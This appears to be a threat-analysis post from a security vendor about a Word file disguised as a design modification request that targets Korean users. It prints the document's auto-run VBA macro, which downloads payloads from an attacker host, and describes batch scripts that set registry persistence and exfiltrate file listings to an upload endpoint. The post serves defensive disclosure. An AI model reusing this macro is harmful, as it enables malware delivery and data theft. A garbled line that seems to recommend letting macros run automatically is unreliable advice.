The ASEC analysis team has discovered the distribution of malicious Word file targeting Korean users. The filename is Design Modification Request.doc, and it includes an image that prompts the user to run the macro.
As shown below, the Word file includes a malicious macro that downloads additional files from hxxp://filedownloaders.com/doc09. When the user clicks Enable Content, the macro is automatically run, and it downloads additional malicious files.
Sub Document_Open() Dim RetVal As Long RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0) RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0) RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0) Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application") OpenDoc.Visible = True Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")
It then runs the downloaded temp.doc document file. The Word file contains texts to disguise as a Korean company.
Sub Document_Open() WinExec "C:\Users\Public\Documents\no1.bat", 0 End Sub
no1.bat that was run via the Word file runs vvire.bat. If vvire.bat does not exist, it decompresses the setup.cab file that was downloaded from hxxp://filedownloaders.com/doc09/vbs6.txt, then runs vvire.bat.
vvire.bat performs the feature of adding to registry, running the no4.bat file, and downloading additional files.
It adds the Start.vbs file to registry so that the vvire.bat file is run automatically, and after running no4.bat, it deletes no1.bat. It then checks to see if a certain file exists and downloads additional files from hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt and runs them. This file cannot be checked as it is currently unavailable for download.
The figure below is Start.vbs file.
no4.bat that was run via vvire.bat performs the feature of collecting information of the user PC below and leaking it to hxxp://senteroman.com/upl11/upload.php.
- C:\Users\%username%\downloads\ list
- C:\Users\%username%\documents\ list
- C:\Users\%username%\desktop\ list
- C:\Program Files\ list
- IP information
Upon running no4.bat, files with collected information are created in the C:\Users\Public\Documents\ folder, and when the collected information is uploaded, it creates the upok.txt file.
As malicious document files that impersonate normal users to prompt users to enable macro such as this malware are consistently being distributed, users must stay vigilant. Also, users should change settings so that the macro inside the document will run automatically, and refrain from opening suspicious documents.
[Relevant IOC Info]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
[…] discovered a word document that is in the same category as the document introduced in the post <Word File Disguised as a Design Modification Request for Information Theft>, uploaded in December last year. The title of the document confirmed in this case is […]